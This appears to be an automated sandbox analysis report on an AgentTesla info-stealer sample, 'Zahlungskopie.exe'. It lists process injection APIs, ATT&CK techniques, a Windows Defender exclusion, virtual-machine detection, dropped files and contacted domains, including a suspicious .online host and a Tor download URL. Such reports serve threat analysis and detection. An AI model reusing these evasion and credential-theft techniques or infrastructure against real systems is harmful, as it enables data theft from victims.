              Source: C:\Users\user\Desktop\Zahlungskopie.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\Desktop\Zahlungskopie.exeCode function: 18_2_05ED5A94 GetUserNameW,18_2_05ED5A94
              Source: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exeCode function: 7_2_0040A272 WriteProcessMemory,GetVersionExW,CreateRemoteThread,7_2_0040A272
              Source: C:\Users\user\Desktop\Zahlungskopie.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information:

              barindex
              Yara detected AgentTeslaShow sources
              Source: Yara matchFile source: 00000012.00000002.913027538.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.915293873.0000000002CC1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Zahlungskopie.exe PID: 6448, type: MEMORY
              Source: Yara matchFile source: 18.2.Zahlungskopie.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000012.00000002.915293873.0000000002CC1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Zahlungskopie.exe PID: 6448, type: MEMORY

              Remote Access Functionality:

              barindex
              Yara detected AgentTeslaShow sources
              Source: Yara matchFile source: 00000012.00000002.913027538.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.915293873.0000000002CC1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Zahlungskopie.exe PID: 6448, type: MEMORY
              Source: Yara matchFile source: 18.2.Zahlungskopie.exe.400000.0.unpack, type: UNPACKEDPE

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsWindows Management Instrumentation211Application Shimming1Exploitation for Privilege Escalation1Disable or Modify Tools11OS Credential DumpingAccount Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsNative API1Windows Service1Application Shimming1Deobfuscate/Decode Files or Information1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothEncrypted Channel12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsCommand and Scripting Interpreter1Logon Script (Windows)Access Token Manipulation1Obfuscated Files or Information2Security Account ManagerSystem Information Discovery114SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsService Execution2Logon Script (Mac)Windows Service1Software Packing1NTDSQuery Registry1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptProcess Injection12Timestomp1LSA SecretsSecurity Software Discovery121SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading1Cached Domain CredentialsVirtualization/Sandbox Evasion14VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion14DCSyncProcess Discovery3Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobAccess Token Manipulation1Proc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection12/etc/passwd and /etc/shadowSystem Owner/User Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
              Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingRemote System Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 361303 Sample: Zahlungskopie.exe Startdate: 02/03/2021 Architecture: WINDOWS Score: 80 38 Found malware configuration 2->38 40 Multi AV Scanner detection for submitted file 2->40 42 Yara detected AgentTesla 2->42 44 2 other signatures 2->44 7 Zahlungskopie.exe 21 12 2->7         started        process3 dnsIp4 32 chelseafc.map.fastly.net 151.101.2.133, 443, 49719, 49720 FASTLYUS United States 7->32 34 0k10dk21kkeok2e.online 104.21.59.148, 49729, 80 CLOUDFLARENETUS United States 7->34 36 8 other IPs or domains 7->36 26 C:\Users\user\...\Zahlungskopie.exe.log, ASCII 7->26 dropped 28 C:\Users\user\AppData\...\1mkqjldz.newcfg, XML 7->28 dropped 30 C:\Users\user\AppData\...\AdvancedRun.exe, PE32 7->30 dropped 46 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 7->46 48 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 7->48 50 Adds a directory exclusion to Windows Defender 7->50 12 powershell.exe 26 7->12         started        14 powershell.exe 23 7->14         started        16 AdvancedRun.exe 1 7->16         started        18 3 other processes 7->18 file5 signatures6 process7 process8 20 conhost.exe 12->20         started        22 conhost.exe 14->22         started        24 AdvancedRun.exe 16->24         started       

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              Zahlungskopie.exe30%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exe3%MetadefenderBrowse
              C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exe0%ReversingLabs

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              18.2.Zahlungskopie.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
              http://www.manutd.com40%Avira URL Cloudsafe
              http://www.microsoft.co0%URL Reputationsafe
              http://www.microsoft.co0%URL Reputationsafe
              http://www.microsoft.co0%URL Reputationsafe
              https://uk.tigerwit.com/about/liverpool0%Avira URL Cloudsafe
              http://www.realmadrid.set_DisallowApplicationBaseProbingcom/base/%.IsThisPointerhtml0%Avira URL Cloudsafe
              http://ocsp.rootg2.amazontrust.com080%URL Reputationsafe
              http://ocsp.rootg2.amazontrust.com080%URL Reputationsafe
              http://ocsp.rootg2.amazontrust.com080%URL Reputationsafe
              http://0k10dk21kkeok2e.online/base/83650593F542427F159D29BCCFD755F9.html0%Avira URL Cloudsafe
              http://crl.sca1b.amazontrust.com/sca1b.crl00%URL Reputationsafe
              http://crl.sca1b.amazontrust.com/sca1b.crl00%URL Reputationsafe
              http://crl.sca1b.amazontrust.com/sca1b.crl00%URL Reputationsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
              https://tribus-watches.com/0%Avira URL Cloudsafe
              http://ocsp.sca1b.amazontrust.com060%URL Reputationsafe
              http://ocsp.sca1b.amazontrust.com060%URL Reputationsafe
              http://ocsp.sca1b.amazontrust.com060%URL Reputationsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
              https://go.micro0%URL Reputationsafe
              https://go.micro0%URL Reputationsafe
              https://go.micro0%URL Reputationsafe
              http://www.manutd.cget_UserSetCursorom/0%Avira URL Cloudsafe
              http://0k10dk21kkeok2e.online/base/0A48866E716remove_ParentChangedB370203D6A936495BDF28.html0%Avira URL Cloudsafe
              http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
              http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
              http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
              http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
              http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
              http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
              http://ocsp.rootca1.amazontrust.com0:0%Avira URL Cloudsafe
              https://reachsportshop.com/team/liverpool/0%Avira URL Cloudsafe
              http://www.realmadrid.set_DisallowApplicationBaseProbingcom/base/0%Avira URL Cloudsafe
              http://crl.rootg2.amazontrust.com/rootg2.crl00%URL Reputationsafe
              http://crl.rootg2.amazontrust.com/rootg2.crl00%URL Reputationsafe
              http://crl.rootg2.amazontrust.com/rootg2.crl00%URL Reputationsafe
              http://www.liverpoolfc.WaitForConnectionAsynccom/0%Avira URL Cloudsafe
              https://www.tiktok.com/0%Avira URL Cloudsafe
              http://www.mancity.com40%Avira URL Cloudsafe
              http://o.ss2.us/00%URL Reputationsafe
              http://o.ss2.us/00%URL Reputationsafe
              http://o.ss2.us/00%URL Reputationsafe
              http://0k10dk21kkeok2e.online/base/83650FSWAsyncResult593F542427F159D29BCCFD755F9.html0%Avira URL Cloudsafe
              http://ocsp.sectigo.com00%URL Reputationsafe
              http://ocsp.sectigo.com00%URL Reputationsafe
              http://ocsp.sectigo.com00%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              0k10dk21kkeok2e.online
              		104.21.59.148
              		truefalse
                		unknown
                chelseafc.map.fastly.net
                		151.101.2.133
                		truefalse
                  		unknown
                  d2hhwit6pbhmvu.cloudfront.net
                  		99.86.159.29
                  		truefalse
                    		high
                    www.realmadrid.com
                    		unknown
                    		unknownfalse
                      		high
                      www.manutd.com
                      		unknown
                      		unknownfalse
                        		high
                        www.liverpoolfc.com
                        		unknown
                        		unknownfalse
                          		high
                          www.mancity.com
                          		unknown
                          		unknownfalse
                            		high
                            www.chelseafc.com
                            		unknown
                            		unknownfalse
                              		high

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://0k10dk21kkeok2e.online/base/83650593F542427F159D29BCCFD755F9.htmlfalse
                              • Avira URL Cloud: safe
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://127.0.0.1:HTTP/1.1Zahlungskopie.exe, 00000012.00000002.915293873.0000000002CC1000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		low
                              https://secure.widget.cloud.opta.net/v3/v3.opta-widgets.jsZahlungskopie.exe, 00000000.00000002.738784790.0000000003F01000.00000004.00000001.sdmpfalse
                                		high
                                https://eacademy.liverpoolfc.com/Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                  		high
                                  http://www.mancity.com/base/Zahlungskopie.exefalse
                                    		high
                                    http://www.manutd.com4Zahlungskopie.exe, 00000000.00000002.732290944.0000000002F36000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0001/74/thumb_73386_partnerlogo_pZahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                      		high
                                      https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/page_banner/0002/08/7abcb0d130016504c4a4761aeZahlungskopie.exe, 00000000.00000002.738784790.0000000003F01000.00000004.00000001.sdmpfalse
                                        		high
                                        http://www.manutd.com/Zahlungskopie.exefalse
                                          		high
                                          http://www.microsoft.copowershell.exe, 0000000B.00000003.818040195.0000000008567000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          https://www.mitel.com/learn/case-studies/liverpool-football-clubZahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                            		high
                                            https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0002/11/thumb_110194_partnerlogo_Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                              		high
                                              https://uk.tigerwit.com/about/liverpoolZahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.liverpoolfc.com/match/2020-21/premier-league-tableZahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                		high
                                                https://www.liverpoolfc.com/news/communityZahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://www.liverpoolfc.com/history/heyselZahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                    		high
                                                    https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/page_banner/0002/08/a645dcf8e1f1cf28fb38a0701Zahlungskopie.exe, 00000000.00000002.738784790.0000000003F01000.00000004.00000001.sdmpfalse
                                                      		high
                                                      https://www.acronis.com/en-gb/Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                        		high
                                                        http://www.realmadrid.set_DisallowApplicationBaseProbingcom/base/%.IsThisPointerhtmlZahlungskopie.exefalse
                                                        • Avira URL Cloud: safe
                                                        		low
                                                        https://faq.liverpoolfc.com/portal/homeZahlungskopie.exe, 00000000.00000002.738784790.0000000003F01000.00000004.00000001.sdmpfalse
                                                          		high
                                                          https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0002/09/thumb_108623_partnerlogo_Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                            		high
                                                            http://www.realmadrid.comZahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                              		high
                                                              https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0002/08/thumb_107697_partnerlogo_Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                		high
                                                                https://d3j2s6hdd6a7rg.cloudfront.net/v2/JE-552/lfc/images/logo-pl-champs-desk-3Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/misc/0002/14/thumb_113619_misc_general_234x23Zahlungskopie.exe, 00000000.00000002.732325527.0000000002F49000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    http://ocsp.rootg2.amazontrust.com08Zahlungskopie.exe, 00000000.00000003.722702678.0000000005F73000.00000004.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://www.levi.com/GB/en_GB/Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      http://www.chelseafc.com/-http://www.manutd.com/9http://www.mancity.com/base/Zahlungskopie.exefalse
                                                                        		high
                                                                        http://www.liverpoolfc.comZahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          http://wwwSetUnresolved.mancity.com/base/Zahlungskopie.exefalse
                                                                            		high
                                                                            https://www.liverpoolfc.com/matchZahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0001/92/thumb_91232_partnerlogo_pZahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                https://www.liverpoolfc.com/news/media-watchZahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  https://www.youtube.com/realmadridZahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    http://crl.sca1b.amazontrust.com/sca1b.crl0Zahlungskopie.exe, 00000000.00000002.779615723.0000000005FEE000.00000004.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://www.realmadrid.comZahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                      		high
                                                                                      http://www.nirsoft.net/AdvancedRun.exe, AdvancedRun.exe, 00000009.00000000.695170028.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.0.drfalse
                                                                                        		high
                                                                                        https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0001/16/thumb_15152_partnerlogo_pZahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                          		high
                                                                                          http://www.standardchartered.com/home/en/index.html?camp_id=liverpool_source=liverpoolfctv_medium=4Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                            		high
                                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameZahlungskopie.exe, 00000000.00000002.732169807.0000000002F01000.00000004.00000001.sdmpfalse
                                                                                              		high
                                                                                              https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0001/41/thumb_40979_partnerlogo_pZahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                                		high
                                                                                                https://www.snapchat.com/Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipZahlungskopie.exe, 00000012.00000002.913027538.0000000000402000.00000040.00000001.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/page_banner/0002/11/aa0024fde91a556201a3e18acZahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0001/73/thumb_72810_partnerlogo_pZahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      https://tribus-watches.com/Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://www.realmadrid.com/base/qDRJjWQmMciVzZexKqxHvQNCUcCUOevUqtCcibaOeqaXQSxokmSbdsVNdhpUn.htmlZahlungskopie.exe, 00000000.00000002.732325527.0000000002F49000.00000004.00000001.sdmp, Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        http://www.liverpoolfc.com/legal/privacy-policyZahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0002/13/thumb_112227_partnerlogo_Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            http://ocsp.sca1b.amazontrust.com06Zahlungskopie.exe, 00000000.00000002.779615723.0000000005FEE000.00000004.00000001.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haZahlungskopie.exe, 00000012.00000002.915293873.0000000002CC1000.00000004.00000001.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            https://go.micropowershell.exe, 0000000B.00000003.812678409.000000000562E000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000003.819057899.0000000004FFF000.00000004.00000001.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            https://www.mancity.com/base/qDRJjWQmMciVzZexKqxHvQNCUcCUOevUqtCcibaOeqaXQSxokmSbdsVNdhpUn.htmlZahlungskopie.exe, 00000000.00000002.732325527.0000000002F49000.00000004.00000001.sdmp, Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              http://www.liverpoolfc.com/legal/terms-and-conditionsZahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                http://www.manutd.cget_UserSetCursorom/Zahlungskopie.exefalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		low
                                                                                                                http://0k10dk21kkeok2e.online/base/0A48866E716remove_ParentChangedB370203D6A936495BDF28.htmlZahlungskopie.exefalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                https://www.liverpoolfc.com/news/academyZahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://crl.rootca1.amazontrust.com/rootca1.crl0Zahlungskopie.exe, 00000000.00000003.722702678.0000000005F73000.00000004.00000001.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  http://www.liverpoolfc.com/history/hillsboroughZahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://www.liverpoolfc.com/scripts/logout.phpZahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sZahlungskopie.exe, 00000000.00000002.738784790.0000000003F01000.00000004.00000001.sdmp, AdvancedRun.exe.0.drfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      http://ocsp.rootca1.amazontrust.com0:Zahlungskopie.exe, 00000000.00000003.722702678.0000000005F73000.00000004.00000001.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      https://matchcentre.liverpoolfc.com?utm_medium=site-link-liverpoolfc.com&amp;utm_source=home-top-navZahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://www.twitter.com/realmadridZahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://d3j2s6hdd6a7rg.cloudfront.net/v2/JE-552/lfc/images/AjaxLoader-298x179.gifZahlungskopie.exe, 00000000.00000002.732325527.0000000002F49000.00000004.00000001.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://reachsportshop.com/team/liverpool/Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            https://www.liverpoolfc.com/news/axa-training-centreZahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://www.axa.com/?utm_source=liverpoolfc&amp;utm_medium=logo-partnership&amp;utm_campaign=lfc1819Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://d3j2s6hdd6a7rg.cloudfront.net/v2/JE-552/lfc/images/lfc-pl-logos-fullZahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/misc/0002/14/thumb_113618_misc_general_234x23Zahlungskopie.exe, 00000000.00000002.732325527.0000000002F49000.00000004.00000001.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/page_banner/0002/11/caba13e5118c92cd18eab74b2Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://www.chelseafc.comZahlungskopie.exe, 00000000.00000002.732290944.0000000002F36000.00000004.00000001.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://www.realmadrid.set_DisallowApplicationBaseProbingcom/base/Zahlungskopie.exefalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        		low
                                                                                                                                        https://www.liverpoolfc.comZahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://crl.rootg2.amazontrust.com/rootg2.crl0Zahlungskopie.exe, 00000000.00000003.722702678.0000000005F73000.00000004.00000001.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          		unknown
                                                                                                                                          http://www.liverpoolfc.WaitForConnectionAsynccom/Zahlungskopie.exefalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          		unknown
                                                                                                                                          https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0002/09/thumb_108617_partnerlogo_Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/page_banner/0002/11/f9d2bf533c57965e0174bf510Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://www.tiktok.com/Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              		unknown
                                                                                                                                              http://events.liverpoolfc.comZahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://www.mancity.com4Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                		unknown
                                                                                                                                                http://o.ss2.us/0Zahlungskopie.exe, 00000000.00000003.722702678.0000000005F73000.00000004.00000001.sdmpfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                		unknown
                                                                                                                                                http://www.liverpoolfc.com/accessible/accessibleZahlungskopie.exe, 00000000.00000002.738784790.0000000003F01000.00000004.00000001.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://0k10dk21kkeok2e.online/base/83650FSWAsyncResult593F542427F159D29BCCFD755F9.htmlZahlungskopie.exefalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  		unknown
                                                                                                                                                  https://schema.org/OrganizationZahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                                                                                    		high
